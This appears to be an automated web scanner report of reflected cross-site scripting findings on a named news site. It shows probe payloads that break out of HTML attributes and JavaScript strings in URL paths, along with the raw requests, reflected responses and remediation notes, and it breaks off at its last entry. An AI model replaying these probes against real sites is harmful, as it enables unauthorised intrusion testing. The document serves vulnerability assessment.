The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89aa1"><a>7f0c239daa7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/Crime89aa1"><a>7f0c239daa7/2010/11/22/PNG_boy_gang_raped_by_women_542337.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:09 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=0759C54ADB044B2BFE80FE176C696A15; Path=/ Content-Language: en Content-Length: 55090 Expires: Tue, 23 Nov 2010 03:35:09 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/Crime89aa1"><a>7f0c239daa7/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4753"%3b3264eb8a561 was submitted in the REST URL parameter 2. This input was echoed as d4753";3264eb8a561 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Crimed4753"%3b3264eb8a561/2010/11/22/PNG_boy_gang_raped_by_women_542337.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:35 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=0825DC71DAEA3C26CB30D57B47CAAE40; Path=/ Content-Language: en Content-Length: 55078 Expires: Tue, 23 Nov 2010 03:35:35 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 705e4'%3b5dd0c3835a0 was submitted in the REST URL parameter 2. This input was echoed as 705e4';5dd0c3835a0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Entertainment705e4'%3b5dd0c3835a0/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:24 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=0FED92A11255198BF9EEDEA49D287156; Path=/ Content-Language: en Content-Length: 55110 Expires: Tue, 23 Nov 2010 03:35:24 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73153"%3bdae3e1737b0 was submitted in the REST URL parameter 2. This input was echoed as 73153";dae3e1737b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Entertainment73153"%3bdae3e1737b0/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:19 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=6962793CA6AA62BCD37DC759749235C6; Path=/ Content-Language: en Content-Length: 55110 Expires: Tue, 23 Nov 2010 03:35:19 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dd0f"><a>c5c8d13386 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/Entertainment3dd0f"><a>c5c8d13386/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:53 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=37D55CE50E0A0D713B2E664BFFEB7598; Path=/ Content-Language: en Content-Length: 55118 Expires: Tue, 23 Nov 2010 03:34:53 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/Entertainment3dd0f"><a>c5c8d13386/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b5b2"%3b8ca4c1b66f7 was submitted in the REST URL parameter 2. This input was echoed as 7b5b2";8ca4c1b66f7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Entertainment7b5b2"%3b8ca4c1b66f7/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:31 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=E4ECA234A8E3804EAB489079F6D796C1; Path=/ Content-Language: en Content-Length: 55110 Expires: Tue, 23 Nov 2010 03:35:31 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5aa8"><a>0be3d1ab538 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/Entertainmentf5aa8"><a>0be3d1ab538/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:06 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=084367B6D906DAC674D1F7F3C30B7C7F; Path=/ Content-Language: en Content-Length: 55122 Expires: Tue, 23 Nov 2010 03:35:06 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/Entertainmentf5aa8"><a>0be3d1ab538/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4152'%3b20a210608ab was submitted in the REST URL parameter 2. This input was echoed as b4152';20a210608ab in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Entertainmentb4152'%3b20a210608ab/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:36 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=30FE261BD5485EBF7601E453BCEF36A8; Path=/ Content-Language: en Content-Length: 55110 Expires: Tue, 23 Nov 2010 03:35:36 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d60f3"%3b68aca0775b8 was submitted in the REST URL parameter 2. This input was echoed as d60f3";68aca0775b8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Financed60f3"%3b68aca0775b8/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:38 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=74834D0329A6270AE85688FE29630897; Path=/ Content-Language: en Content-Length: 55086 Expires: Tue, 23 Nov 2010 03:34:38 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c6bc'%3b2d469c6535b was submitted in the REST URL parameter 2. This input was echoed as 3c6bc';2d469c6535b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Finance3c6bc'%3b2d469c6535b/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:44 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=9EA5C9E7E2DC903B1426C28079490C11; Path=/ Content-Language: en Content-Length: 55086 Expires: Tue, 23 Nov 2010 03:34:44 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50282"><a>96bbe631d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/Finance50282"><a>96bbe631d4/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:12 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=A04EA8A14E2453D7383841AB2EF6D1B2; Path=/ Content-Language: en Content-Length: 55094 Expires: Tue, 23 Nov 2010 03:34:12 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/Finance50282"><a>96bbe631d4/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b102c"><a>0c60b0a8b0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/OddSpotb102c"><a>0c60b0a8b0c/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:14 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=D3B42B8F2EF6F73207F72FC9F04841F0; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:14 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/OddSpotb102c"><a>0c60b0a8b0c/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d9be'%3b9a1cad784f2 was submitted in the REST URL parameter 2. This input was echoed as 3d9be';9a1cad784f2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/OddSpot3d9be'%3b9a1cad784f2/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:45 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=3587DAF9E886DFF37B24F07EB9157E79; Path=/ Content-Language: en Content-Length: 55086 Expires: Tue, 23 Nov 2010 03:34:45 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39793"%3b63f039517b8 was submitted in the REST URL parameter 2. This input was echoed as 39793";63f039517b8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/OddSpot39793"%3b63f039517b8/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:40 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=B749F71185B5F0FF136FCFD0C1DCA4DF; Path=/ Content-Language: en Content-Length: 55086 Expires: Tue, 23 Nov 2010 03:34:40 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a505d'%3b1257035e122 was submitted in the REST URL parameter 2. This input was echoed as a505d';1257035e122 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Technologya505d'%3b1257035e122/2010/11/23/Extraterrestrial_particles_discovered_542531.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:47 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=D5934E03CDD285C19E0B61D7F0D2DC45; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:47 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 703ac"%3b8257a7f6be7 was submitted in the REST URL parameter 2. This input was echoed as 703ac";8257a7f6be7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Technology703ac"%3b8257a7f6be7/2010/11/23/Extraterrestrial_particles_discovered_542531.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:42 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=EE0FF455FB35502FC4A3392E878416BB; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:42 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e06f"><a>d510eda427 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/Technology5e06f"><a>d510eda427/2010/11/23/Extraterrestrial_particles_discovered_542531.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:16 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=3169B5048F8D984019A373AE2DA3993F; Path=/ Content-Language: en Content-Length: 55106 Expires: Tue, 23 Nov 2010 03:34:16 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/Technology5e06f"><a>d510eda427/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef69a'%3ba0c859ce77d was submitted in the REST URL parameter 2. This input was echoed as ef69a';a0c859ce77d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Technologyef69a'%3ba0c859ce77d/2010/11/23/US_rocket_sent_into_space_542693.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:24 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=17F832A20A6A78A2D3115499F367165F; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:35:24 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 518b6"%3b720bdf3afc8 was submitted in the REST URL parameter 2. This input was echoed as 518b6";720bdf3afc8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Technology518b6"%3b720bdf3afc8/2010/11/23/US_rocket_sent_into_space_542693.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:18 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=3EDB6D6320F57F0EE8C1270D10E6C076; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:35:18 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d5f"><a>db7ed93e8b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/Technology36d5f"><a>db7ed93e8b5/2010/11/23/US_rocket_sent_into_space_542693.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:54 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=FBAB25FC17CDCFAFA4278A13DD235BC2; Path=/ Content-Language: en Content-Length: 55110 Expires: Tue, 23 Nov 2010 03:34:54 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/Technology36d5f"><a>db7ed93e8b5/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e656"><a>33746008f1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/TopStories9e656"><a>33746008f1a/2010/11/23/Cambodian_festival_stampede_542577.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:04 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=9D0B79279B9CFDFE124D66436C05DC8B; Path=/ Content-Language: en Content-Length: 55110 Expires: Tue, 23 Nov 2010 03:34:04 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/TopStories9e656"><a>33746008f1a/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f1c5'%3be61c15ecfb6 was submitted in the REST URL parameter 2. This input was echoed as 2f1c5';e61c15ecfb6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
